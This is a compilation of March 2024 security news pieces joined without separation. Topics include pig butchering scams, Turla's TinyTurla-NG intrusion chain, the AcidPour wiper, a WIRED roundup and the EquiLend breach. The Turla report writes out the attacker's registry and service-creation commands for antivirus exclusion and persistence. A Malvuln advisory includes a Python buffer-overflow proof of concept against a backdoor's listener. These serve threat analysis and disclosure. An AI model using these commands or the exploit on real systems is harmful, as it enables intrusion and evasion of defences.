In the case of pig butchering scams, it’s not really anything that can be solved by a cybersecurity solution or sold in a package.

Thursday, March 21, 2024 14:00

Whether you want to call them “catfishing,” “pig butchering” or just good ‘old-fashioned “social engineering,” romance scams have been around forever.  

I was first introduced to them through the MTV show “Catfish,” but recently they seem to be making headlines as the term “pig butchering” enters the public lexicon. John Oliver recently covered it on “Last Week Tonight,” which means everyone my age with an HBO account heard about it a few weeks ago. And one of my favorite podcasts going, “Search Engine,” just covered it in an episode. 

The concept of “pig butchering” scams generally follows the same chain of events: 

*   An unknown phone number texts or messages a target with a generally harmless message, usually asking for a random name disguised as an “Oops, wrong number!” text. 
*   When the target responds, the actor tries to strike up a conversation with a friendly demeanor. 
*   If the conversation persists, they usually evolve into “love bombing,” including compliments, friendly advice, ego-boosting, and saying flattering things about any photos the target has sent. 
*   Sometimes, the relationship may turn romantic. 
*   The scammer eventually “butchers” the “pig” that has been “fattened up” to that point, scamming them into handing over money, usually in the form of a phony cryptocurrency app, or just straight up asking for the target to send the scammer money somehow. 

There are a few twists and turns along the way based on the exact scammer, but that’s generally how it works. What I think is important to remember is that this specific method of separating users from their money is not actually new.  

The FBI seems to release a renewed warning about romance scams every Valentine’s Day when people are more likely to fall for a stranger online wanting to make a real connection and then eventually asking for money. I even found a podcast from the FBI in 2015 in which they warned that scammers “promise love, romance, to entice their victims online,” estimating that romance-related scams cost consumers $82 million in the last half of 2014.  

The main difference that I can tell between “pig butchering” and past romance scams is the sheer scale. Many actors running these operations are relying on human trafficking and sometimes literal imprisonment, forcing these people against their will to send these mass blocks of messages to a variety of targets indiscriminately. Oftentimes in these groups, scammers who are less “successful” in luring victims can be verbally and physically harassed and punished. That is, of course, a horrible human toll that these operations are taking, but they also extend far beyond the world of cybersecurity. 

In the case of pig butchering scams, it’s not really anything that can be solved by a cybersecurity solution or sold in a package. Instead, it relies on user education and the involvement of law enforcement agencies and international governments to ensure these farms can’t operate in the shows. The founders who run them are brought to justice. 

It’s never a bad thing that users become more educated on these scams, because of that, but I also feel it’s important to remember that romance-related scams, and really any social engineering built on a personal “relationship,” has been around for years, and “pig butchering” is not something new that just started popping up. 

These types of scams are ones that our culture has kind of just accepted as part of daily life at this point (who doesn’t get surprised when they get a call about their “car’s extended warranty?), and now the infrastructure to support these scams is taking a larger human toll than ever. 

**The one big thing **

Talos has yet another round of research into the Turla APT, and now we’re able to see the entire kill chain this actor uses, including the tactics, techniques and procedures (TTPs) utilized to steal valuable information from their victims and propagate through their infected enterprises. Before deploying TinyTurla-NG, Turla will attempt to configure anti-virus software exclusions to evade detection of their backdoor. Once exclsions have been set up, TTNG is written to the disk, and persistence is established by creating a malicious service. 

**Why do I care? **

Turla, and this recently discovered TinyTurlaNG tool that Talos has been writing about, is an international threat that’s been around for years, so it’s always important for the entire security community to know what they’re up to. Most recently, Turla used these tactics to target Polish non-governmental organizations (NGOs) and steal sensitive data.  

**So now what? **

During Talos’ research into TinyTurla-NG, we’ve released several new rounds of detection content for Cisco Secure products. Read our past two blog posts on this actor for more.  

**Top security headlines of the week **

**The Biden administration issued a renewed warning to public water systems and operators this week,** saying state-sponsored actors could carry out cyber attacks soon, citing ongoing threats from Iran and China. The White House and U.S. Environmental Protection Agency sent a letter to every U.S. governor this week warning them that cyber attacks could disrupt access to clean drinking water and “impose significant costs on affected communities.” The letter also points to the U.S. Cyber and Infrastructure Security Agency’s list of known exploited vulnerabilities catalog, asking the managers of public water systems to ensure their systems are patched against these vulnerabilities. The EPA pointed to Volt Typhoon, a recently discovered Chinese APT that has reportedly been hiding on critical infrastructure networks for an extended period. A meeting among federal government leaders from the EPA and other related agencies is scheduled for March 21 to discuss threats to public water systems and how they can strengthen their cybersecurity posture. (Bloomberg, The Verge) 

**UnitedHealth says it's still recovering from a cyber attack that’s halted crucial payments to health care providers across the U.S.,** but has started releasing some of those funds this week, and expects its payment processing software to be back online soon. The cyber attack, first disclosed in February, targeted Change Healthcare, a subsidiary of United, that handles payment processing and pharmaceutical orders for hospital chains and doctors offices. UnitedHealth’s CEO said in a statement this week that the company has paid $2 billion to affected providers who spent nearly a month unable to obtain those funds or needing to switch to a paper billing system. A recently published survey from the American Hospital Association found that 94 percent of hospitals that responded experienced financial disruptions from the Change Healthcare attack, and costs at one point were hitting $1 million in revenue per day. (ABC News, CNBC) 

**Nevada’s state court system is currently weighing a case that could undo end-to-end encryption across the U.S.** The state’s Attorney General is currently suing Meta, the creators of Facebook, Instagram and WhatsApp, asking the company to remove end-to-end encryption for minors on the platform, with the promise of being able to catch and charge users who abuse the platform to lure minors. However, privacy advocates are concerned that any rulings against Meta and its encryption policies could have larger ripple effects, and embolden others to challenge encryption in other states. Nevada is arguing that Meta’s Messenger a “preferred method” for individuals targeting Nevada children for illicit activities. Privacy experts are in favor of end-to-end encryption because it safeguards messages during transmission and makes it more difficult for other parties to intercept and read them — including law enforcement agencies. (Tech Policy Press, Bloomberg Law) 

**Can’t get enough Talos? **

*   The LockBit story: Why the ransomware affiliate model can turn takedowns into disruptions 
*   Cisco Closes $28B Splunk Deal: 5 Big AI, Security And Partner Things To Know 
*   Talos Takes Ep. #176: Why no one should be relying on passive security in 2024 
*   Dissecting a complex vulnerability and achieving arbitrary code execution in Ichitaro Word 
*   Netgear wireless router open to code execution after buffer overflow vulnerability 

**Upcoming events where you can find Talos **

**Botconf** **(April 23 - 26)** 

_Nice, Côte d'Azur, France_

> _This presentation from Chetan Raghuprasad details the Supershell C2 framework. Threat actors are using this framework massively and creating botnets with the Supershell implants._

**CARO Workshop 2024** **(May 1 - 3)** 

_Arlington, Virginia_

> Over the past year, we’ve observed a substantial uptick in attacks by YoroTrooper, a relatively nascent espionage-oriented threat actor operating against the Commonwealth of Independent Countries (CIS) since at least 2022. Asheer Malhotra's presentation at CARO 2024 will provide an overview of their various campaigns detailing the commodity and custom-built malware employed by the actor, their discovery and evolution in tactics. He will present a timeline of successful intrusions carried out by YoroTrooper targeting high-value individuals associated with CIS government agencies over the last two years.

**RSA** **(May 6 - 9)** 

_San Francisco, California_    

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647   
**MD5:** bbcf7a68f4164a9f5f5cb2d9f30d9790   
**Typical Filename:** bbcf7a68f4164a9f5f5cb2d9f30d9790.vir   
**Claimed Product:** N/A   
**Detection Name:** Win.Dropper.Scar::1201 

**SHA 256:** 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507    
**MD5:** 2915b3f8b703eb744fc54c81f4a9c67f    
**Typical Filename:** VID001.exe    
**Claimed Product:** N/A    
**Detection Name:** Win.Worm.Coinminer::1201 

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91    
**MD5:** 7bdbd180c081fa63ca94f9c22c457376   
**Typical Filename:** c0dwjdi6a.dll |  
**Claimed Product:** N/A    
**Detection Name:** Trojan.GenericKD.33515991 

**SHA 256:** 7b3ec2365a64d9a9b2452c22e82e6d6ce2bb6dbc06c6720951c9570a5cd46fe5   
**MD5:** ff1b6bb151cf9f671c929a4cbdb64d86   
**Typical Filename:** endpoint.query   
**Claimed Product:** Endpoint-Collector   
**Detection Name:** W32.File.MalParent 

**SHA 256:** e38c53aedf49017c47725e4912fc7560e1c8ece2633c05057b22fd4a8ed28eb3   
**MD5:** c16df0bfc6fda86dbfa8948a566d32c1   
**Typical Filename:** CEPlus.docm   
**Claimed Product:** N/A    
**Detection Name:** Doc.Downloader.Pwshell::mash.sr.sbx.vioc

“Pig butchering” is an evolution of a social engineering tactic we’ve seen for years

The Russia-linked threat actor known as Turla infected several systems belonging to an unnamed European non-governmental organization (NGO) in order to deploy a backdoor called TinyTurla-NG.
"The attackers compromised the first system, established persistence and added exclusions to antivirus products running on these endpoints as part of their preliminary post-compromise actions," Cisco

Russia Hackers Using TinyTurla-NG to Breach European NGO's Systems

We now have new information on the entire kill chain this actor uses, including the tactics, techniques and procedures (TTPs) utilized to steal valuable information from their victims and propagate through their infected enterprises.

Cisco Talos is providing an update on its two recent reports on a new and ongoing campaign where Turla, a Russian espionage group, deployed their TinyTurla-NG (TTNG) implant. We now have new information on the entire kill chain this actor uses, including the tactics, techniques and procedures (TTPs) utilized to steal valuable information from their victims and propagate through their infected enterprises. 

*   Talos’ analysis, in coordination with CERT.NGO, reveals that Turla infected multiple systems in the compromised network of a European non-governmental organization (NGO). 

*   The attackers compromised the first system, established persistence and added exclusions to anti-virus products running on these endpoints as part of their preliminary post-compromise actions. 

*   Turla then opened additional channels of communication via Chisel for data exfiltration and to pivot to additional accessible systems in the network.

**Tracing Turla’s steps from compromise to exfiltration**

Talos discovered that post-compromise activity carried out by Turla in this intrusion isn’t restricted to the sole deployment of their backdoors. Before deploying TinyTurla-NG, Turla will attempt to configure anti-virus software exclusions to evade detection of their backdoor. Once exclusions have been set up, TTNG is written to the disk, and persistence is established by creating a malicious service.

**Preliminary post-compromise activity and TinyTurla-NG deployment**

After gaining initial access, Turla first adds exclusions in the anti-virus software, such as Microsoft Defender, to locations they will use to host the implant on the compromised systems.

ACTION

INTENT

HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths | 

“C:\\Windows\\System32\\” = 0x0

\[T1562.001\] Impair Defenses: Disable or Modify Tools

Turla then sets up the persistence of the TinyTurla-NG implants using one or more batch (BAT) files. The batch files create a service on the system to persist the TTNG DLL on the system. 

ACTION

INTENT

reg add "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost" /v sysman /t REG\_MULTI\_SZ /d "sdm" /f

reg add "HKLM\\SYSTEM\\CurrentControlSet\\services\\sdm\\Parameters" /v ServiceDll /t REG\_EXPAND\_SZ /d "%systemroot%\\system32\\dcmd.dll" /f

\[T1543.003\] Create or Modify System Process: Windows Service

sc create sdm binPath= "c:\\windows\\system32\\svchost.exe -k sysman" type= share start= auto

sc config sdm DisplayName= "System Device Manager"

sc description sdm "Creates and manages system-mode driver processes. This service cannot be stopped."

  

\[T1543.003\] Create or Modify System Process: Windows Service

This technique is identical to that used by Turla in 2021 to achieve persistence for their TinyTurla implants. However, we’re still unsure why the actor uses two different batch files, but it seems to be an unnecessarily convoluted approach to evade detections.

In the case of TTNG, the service is created with the name “sdm” masquerading as a “System Device Manager” service. 

Batch file contents.

The creation and start of the malicious service kick starts the execution of the TinyTurla-NG implant via svchost\[.\]exe (Windows’ service container). TinyTurla-NG is instrumented further to conduct additional reconnaissance of directories of interest and then copy files to a temporary staging directory on the infected system, followed by subsequent exfiltration to the C2. TinyTurla-NG is also used to deploy a custom-built Chisel beacon from the open-sourced offensive framework.

**Custom Chisel usage**

On deployment, Chisel will set up a reverse proxy tunnel to an attacker-controlled box \[T1573.002 - Encrypted Channel: Asymmetric Cryptography\]. We’ve observed that the attackers leveraged the chisel connection to the initially compromised system, to pivot to other systems in the network. 

The presence of Windows Remote Management (WinRM)-based connections on the target systems indicates that chisel was likely used in conjunction with other tools, such as proxy chains and evil-winrm to establish remote sessions. WinRM is Microsoft’s implementation of the WS-Management protocol and allows Windows-based systems to exchange information and be administered using scripts or built-in utilities.

The overall infection chain is visualized below.

Turla tactics, tools and procedures flow.

Once the attackers have gained access to a new box, they will repeat their activities to create Microsoft Defender exclusions, drop the malware components, and create persistence, indicating that Turla follows a playbook that can be articulated as the following cyber kill chain.

Cyber kill chain.

Analyzing the traffic originating from Chisel revealed the tool beaconed back to its C2 server every hour.

While the infected systems were compromised as early as October 2023 and Chisel was deployed as late as December 2023, Turla operators conducted the majority of their data exfiltration over using Chisel much later on Jan. 12, 2024 \[T1041 - Exfiltration Over C2 Channel\].

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

**IOCS****Hashes**

267071df79927abd1e57f57106924dd8a68e1c4ed74e7b69403cdcdf6e6a453b

d6ac21a409f35a80ba9ccfe58ae1ae32883e44ecc724e4ae8289e7465ab2cf40

ad4d196b3d85d982343f32d52bffc6ebfeec7bf30553fa441fd7c3ae495075fc

13c017cb706ef869c061078048e550dba1613c0f2e8f2e409d97a1c0d9949346

b376a3a6bae73840e70b2fa3df99d881def9250b42b6b8b0458d0445ddfbc044 

**Domains**

hanagram\[.\]jpthefinetreats\[.\]com

caduff-sa\[.\]chjeepcarlease\[.\]com

buy-new-car\[.\]com

carleasingguru\[.\]com

**IP Addresses**

91\[.\]193\[.\]18\[.\]120

New details on TinyTurla’s post-compromise activity reveal full kill chain

By Waqas
Another day, another malware threat emerges in a country already at war.
This is a post from HackRead.com Read the original post: New AcidRain Linux Malware Variant “AcidPour” Found Targeting Ukraine

SentinelLabs researchers have discovered “AcidPour,” a variant of the AcidRain Linux malware targeting Linux systems in Ukraine. This new strain expands on its predecessor and poses a risk to users.

Researchers at SentinelLabs have uncovered a new variant of the Acid Rain malware, dubbed “Acid Pour,” which has emerged in Ukraine. The discovery was made over the weekend, with J. A. Guerrero-Saade, AVP of SentinelLabs, sharing insights via X (formally Twitter).

The original AcidRain malware surfaced in March 2022, notably used during the ‘Viasat hack,’ which disrupted KA-SAT Surfbeam2 modems at the onset of the Russian invasion of Ukraine.

> It's been an interesting weekend! Eagle-eyed @TomHegel spotted what appears to be a new variant of AcidRain. Notably this sample was compiled for Linux x86 devices, we are calling it 'AcidPour'. Those of you that analyzed AcidRain will recognize some of the strings. Analysis 🧵 pic.twitter.com/wY3PJKaOwK
> 
> — J. A. Guerrero-Saade (@juanandres\_gs) March 18, 2024

TomHegel, Principal Threat Researcher at SentinelLabs, identified the new variant, compiled specifically for Linux x86 devices. While AcidPour shares similarities with AcidRain in certain strings, it separates significantly in its codebase, compiled for x86 architecture rather than MIPS.

It is worth noting that popular Linux distros for x86 devices include Ubuntu, Mint, Fedora, and Debian. On the other hand, MIPS (Microprocessor without Interlocked Pipelined Stages) is a type of instruction set architecture (ISA), which essentially defines the language a processor understands and uses to execute instructions. Similar to x86, it’s a set of rules and specifications for how a processor operates.

AcidRain operated as a generic wiper, targeting common directories and device paths on embedded Linux distros. AcidPour, however, introduces new elements, referencing Unsorted Block Images (UBI) and virtual block devices associated with Logical Volume Manager (LVM), suggesting a potential expansion of targets beyond previous iterations.

Despite the similarities, there are notable differences, including a distinct wiping logic for devices like LVMs, indicating a potentially evolved strategy by threat actors. The good news is that SentinelLabs has raised awareness of AcidPour among stakeholders in Ukraine, although the specific targets and scope of the operation remain unclear.

The discovery goes on to show how fast malware threats are evolving, with attackers adapting their tactics to exploit vulnerabilities in various systems. From the perspective of an unsuspecting user or an organization in the business, both must keep an eye on cybersecurity threats like AcidRain and AcidPour.

Begin by prioritizing training for yourself and your employees, as phishing attacks act as a primary gateway for malware infection. Consider leveraging AI-powered chatbots such as ChatGPT or Gemini AI to compile a concise yet essential guide outlining preventive measures against phishing, malware, ransomware, and data breaches.

1.  Someone DDoSed Ukraine’s national postal service for 48 hours
2.  DDoS Attack and Data Wiper Malware hit Computers in Ukraine
3.  Hackers Using Old WinRAR Flaw in New Cyberattack on Ukraine
4.  ‘Destructive malware’ fakes ransomware to target Ukrainian orgs
5.  Backdoor Attack Uses Russian-Ukrainian Conflict Phishing Emails

New AcidRain Linux Malware Variant “AcidPour” Found Targeting Ukraine

Plus: The operator of a dark-web cryptocurrency “mixing” service is found guilty, and a US senator reveals that popular safes contain secret backdoors.

How do you know the internet has a deepfake porn problem? Just look at copyright takedown requests. WIRED found this week that Google is receiving thousands of Digital Millennium Copyright Act complaints for deepfake nudes, most of which are published by just a handful of websites. Experts say the deluge of DMCA takedown requests is evidence that Google should delist the offending sites from search. In Texas, meanwhile, a federal court upheld the state’s age-verification requirements for porn sites, which could lead to even more lawsuits.

In a win for privacy advocates, Airbnb announced on Monday that it will ban the use of indoor security cameras at short-term rental properties around the world. The ban extends to outdoor areas where there is a “greater expectation of privacy,” such as saunas or outdoor showers. The company has long banned the use of hidden cameras and required hosts to tell guests where it has security cameras installed. Hosts who violate the security cam ban could have their properties removed from Airbnb.

Cryptocurrency firm Binance’s troubles have gone from bad to downright scary. Two of the company's executives—Tigran Gambaryan, a former financial crimes investigator for the IRS, and UK-based government affairs specialist Nadeem Anjarwalla, have been held for weeks by Nigeria’s government amid its broader crackdown on cryptocurrency. Neither man has been charged with any crime, and their families are asking the US and UK governments for help securing their release.

In case you’re wondering: No, the US government isn’t hiding evidence of aliens, according to a new Pentagon report. But it sure seems to be hiding _something_, raising more questions about what’s out there if that thing isn’t UFOs. Elsewhere in the world of government secrets, the US House Intelligence Committee chair recently held a closed-door meeting in which he urged lawmakers to block privacy reforms to a major US surveillance program by citing how it could be used to surveil US-based protesters, further raising civil liberties concerns. Congress’ efforts to renew that program, known as Section 702, remain ongoing.

Donald Trump this week earned enough delegates in the 2024 Republican primary to officially win the party’s nomination. If Trump does win another term in the White House, experts fear he could use a slate of “emergency powers” to carry out an authoritarian agenda—and there’s little the other branches of government could do to stop him.

Finally, reporters at _Der Spiegel_, Recorder, _The_ _Washington Post_, and WIRED collaborated on an investigation into a global network of violent predators who use major platforms like Discord, Telegram, and even Roblox to target children and extort them into committing horrific acts of abuse—or worse.

And that’s not all. Each week, we round up the security news we didn’t cover in-depth ourselves. Click the headlines to read the full stories, and stay safe out there.

Insurance companies have long offered discounts to drivers who'll carry GPS devices or download smartphone apps that track their driving habits. But when wary drivers refuse, insurers find other ways of monitoring their driving. Data brokers like LexisNexus are buying people's car data directly from manufacturers, such as General Motors, which are making a killing by selling it off. This data is then used to create “risk” scores for individual drivers, which insurance providers use to set premiums. The businesses claim the data-sharing is consensual, but most drivers have no idea what's happening. Drivers whose risk scores are shared with insurance providers often see their monthly insurance payments skyrocket.

**The Bitcoin Fog Case Ends in a Guilty Verdict**

The operator of a darknet cryptocurrency “mixing” service called Bitcoin Fog faces a maximum of 20 years in prison after his conviction this week by a federal jury in Washington, DC. Roman Sterlingov, 35, ran Bitcoin Fog between 2011 and 2021, moving roughly $400 million worth of currency, much of which, prosecutors say, was tied to narcotics, identity theft, and cybercrime. Sterlingov had denied founding Bitcoin Fog in interviews with WIRED; however, the US Justice Department countered that claim in court with blockchain analysis and a trial of financial paperwork.

**Popular Safes Contain Secret Backdoors**

Two commercial safe makers have been called out for installing backdoors in their safes, according to a letter by Ron Wyden, a US senator from Oregon. The reset codes are one reason the Department of Defense has banned the safes from being used inside the US government. Knowledge of the codes, which Wyden says leaves consumers vulnerable to criminals and spies, was made public through a letter he wrote to the National Counterintelligence and Security Center. In it, he asks the agency to issue an alert, warning Americans about the risks posed by the safes.

Automakers Are Telling Your Insurance Company How You Really Drive

Backdoor.Win32.Emegrab.b malware suffers from a buffer overflow vulnerability.

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024  
Original source: https://malvuln.com/advisory/19a14d0414aec62ef38378de2e8b259d.txt  
Contact: malvuln13@gmail.com  
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Emegrab.b  
Vulnerability: Remote Stack Buffer Overflow (SEH)  
Family: Emegrab  
Type: PE32  
MD5: 19a14d0414aec62ef38378de2e8b259d  
Vuln ID: MVID-2024-0675  
ASLR: False  
DEP: False  
CFG: False  
Safe SEH: False  
Disclosure: 03/13/2024  
Description: The malware listens on TCP port 2323 (typically) however, have seen it use 4823. On subsequent restarts it has used 3012, 3182, 4735, 4578, 4133, 5347, 4978 then eventually reuses port 2323. Third-party adversaries who can reach the server can send a specially crafted payload triggering a stack buffer overflow overwriting ECX, EIP registers and Structured Exception Handler (SEH).

Memory Dump:  
(14c0.b6c): Access violation - code c0000005 (first/second chance not available)  
eax=00000000 ebx=00000000 ecx=41414141 edx=775e9d70 esi=00000000 edi=00000000  
eip=41414141 esp=260013e8 ebp=26001408 iopl=0         nv up ei pl zr na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246  
41414141 ??              ???

0:009> .ecxr  
eax=00000000 ebx=00000000 ecx=41414141 edx=775e9d70 esi=00000000 edi=00000000  
eip=41414141 esp=260013e8 ebp=26001408 iopl=0         nv up ei pl zr na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246  
41414141 ??              ???

0:009> !analyze -v  
*******************************************************************************  
*                                                                             *  
*                        Exception Analysis                                   *  
*                                                                             *  
*******************************************************************************

*** WARNING: Unable to verify checksum for Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e  
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e - 

FAULTING_IP:   
Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d+fa2b  
0040fa2b 888434a0000000  mov     byte ptr [esp+esi+0A0h],al

EXCEPTION_RECORD:  260f5de8 -- (.exr 0x260f5de8)  
ExceptionAddress: 0040fa2b (Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d+0x0000fa2b)  
   ExceptionCode: c0000005 (Access violation)  
  ExceptionFlags: 00000000  
NumberParameters: 2  
   Parameter[0]: 00000001  
   Parameter[1]: 26100000  
Attempt to write to address 26100000

PROCESS_NAME:  Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1:  00000008

EXCEPTION_PARAMETER2:  41414141

WRITE_ADDRESS:  41414141 

FOLLOWUP_IP:   
Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d+fa2b  
0040fa2b 888434a0000000  mov     byte ptr [esp+esi+0A0h],al

FAILED_INSTRUCTION_ADDRESS:   
+fa2b  
41414141 ??              ???

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

IP_ON_HEAP:  41414141

IP_IN_FREE_BLOCK: 41414141

CONTEXT:  260f5e38 -- (.cxr 0x260f5e38)  
eax=00000041 ebx=00000000 ecx=0be58a88 edx=260f61e0 esi=00009cc8 edi=00433f74  
eip=0040fa2b esp=260f6298 ebp=260fff80 iopl=0         nv up ei pl zr na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246  
Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d+0xfa2b:  
0040fa2b 888434a0000000  mov     byte ptr [esp+esi+0A0h],al ss:002b:26100000=??  
Resetting default scope

FAULTING_THREAD:  ffffffff

BUGCHECK_STR:  APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141

PRIMARY_PROBLEM_CLASS:  STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141

DEFAULT_BUCKET_ID:  STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141

LAST_CONTROL_TRANSFER:  from 41414141 to 0040fa2b

FRAME_ONE_INVALID: 1

STACK_TEXT:    
260f6298 0040fa2b backdoor_win32_emegrab_b+0xfa2b  
260fff88 41414141 unknown!printable+0x0  
260fff8c 41414141 unknown!printable+0x0  
260fff90 41414141 unknown!printable+0x0  
260fff94 41414141 unknown!printable+0x0  
260fff98 41414141 unknown!printable+0x0  
260fff9c 41414141 unknown!printable+0x0  
260fffa0 41414141 unknown!printable+0x0  
260fffa4 41414141 unknown!printable+0x0  
260fffa8 41414141 unknown!printable+0x0  
260fffac 41414141 unknown!printable+0x0  
260fffb0 41414141 unknown!printable+0x0  
260fffb4 41414141 unknown!printable+0x0  
260fffb8 41414141 unknown!printable+0x0  
260fffbc 41414141 unknown!printable+0x0  
260fffc0 41414141 unknown!printable+0x0  
260fffc4 41414141 unknown!printable+0x0  
260fffc8 41414141 unknown!printable+0x0  
260fffcc 41414141 unknown!printable+0x0  
260fffd0 41414141 unknown!printable+0x0  
260fffd4 41414141 unknown!printable+0x0  
260fffd8 41414141 unknown!printable+0x0  
260fffdc 41414141 unknown!printable+0x0  
260fffe0 41414141 unknown!printable+0x0  
260fffe4 41414141 unknown!printable+0x0  
260fffe8 41414141 unknown!printable+0x0  
260fffec 41414141 unknown!printable+0x0  
260ffff0 41414141 unknown!printable+0x0  
260ffff4 41414141 unknown!printable+0x0  
260ffff8 41414141 unknown!printable+0x0  
260ffffc 41414141 unknown!printable+0x0  
26100000 41414141 unknown!printable+0x0

STACK_COMMAND:  .cxr 00000000260F5E38 ; kb ; dds 260f6298 ; kb

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  backdoor_win32_emegrab_b+fa2b

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d

IMAGE_NAME:  Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e

DEBUG_FLR_IMAGE_TIMESTAMP:  4a822c0e

FAILURE_BUCKET_ID:  STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_c0000005_Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e!Unknown

BUCKET_ID:  APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_BAD_IP_backdoor_win32_emegrab_b+fa2b  
0:009> !exchain  
260013fc: ntdll!ExecuteHandler2+44 (775e9d70)  
260fffcc: 41414141  
Invalid exception stack at 41414141

Exploit/PoC:  
from socket import *

MALWARE_HOST="x.x.x.x"  
PORT=2323  
s=socket(AF_INET, SOCK_STREAM)  
s.connect((MALWARE_HOST, PORT))

PAYLOAD="A"*666  
s.send(PAYLOAD.encode())  
s.close()

print("Backdoor.Win32.Emegrab BOF Exploit by Malvuln")

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Emegrab.b MVID-2024-0675 Buffer Overflow

By Waqas
Some reports suggest that LockBit ransomware gang is behing the EquiLend data breach.
This is a post from HackRead.com Read the original post: EquiLend Employee Data Breached After January Ransomware Attack

EquiLend, a financial technology firm, experienced a data breach following a January ransomware attack – EquiLend is offering credit monitoring and identity theft protection to affected individuals.

Financial technology firm EquiLend recently disclosed a data breach reportedly originating from a January ransomware attack. The attack, which according to Bloomberg’s report, is attributed to the LockBit ransomware group, compromised the personal information of EquiLend employees.

The claim that LockBit ransomware is involved in the incident is concerning for businesses, as the group, despite its shutdown, has not only resurfaced but is already targeting new victims.

****Breach Details Emerge****

EquiLend initially reported a “technical issue” on January 24th, leading to service disruptions. The company later confirmed a ransomware attack but provided limited details. Recent notifications to affected individuals and authorities reveal the extent of the data breach.

****Employee Information Exposed****

According to the notification sent by the company to impacted customers, the attack compromised sensitive employee data, including names, dates of birth, Social Security numbers, and internal payroll information. EquiLend assures it has no evidence of this information being misused but is offering two years of complimentary credit monitoring and identity theft protection services to affected individuals.

****Ransomware Attack Scope Unclear****

While client-facing services were restored by February 5th, the full impact of the attack remains unclear. Speculation suggests EquiLend may have negotiated with the attackers, but the company has not confirmed any ransom payment.

It’s worth noting that at the time of writing, LockBit’s dark web leak site showed no mention of EquiLend. This could indicate that negotiations have occurred, or the group has yet to list EquiLend on their website.

****EquiLend Responds****

EquiLend is working with cybersecurity experts to investigate the incident and prevent future occurrences. The company emphasizes its commitment to data security and is urging affected individuals to remain vigilant and monitor their financial statements for suspicious activity.

****Experts Weigh In****

For insights, we reached out to Tamara Kirchleitner, Senior Intelligence Operations Analyst at Centripetal. “In the wake of this cyberattack, it’s a stark reminder of the relentless threat fintech firms face. Offering affected employees free identity theft protection is commendable, yet many companies remain reactive,” Tamara said.

“This incident underscores the need for proactive cybersecurity measures. Implementing robust protocols is imperative in today’s digital landscape. Businesses must embrace advanced technologies to safeguard their systems and customer data. It’s time for a paradigm shift towards anticipatory cybersecurity,” she warned.

****Importance of Cybersecurity****

This incident highlights the growing threat of ransomware attacks and the importance of strong cybersecurity measures. Financial institutions like EquiLend handle sensitive data, making them prime targets for cybercriminals.

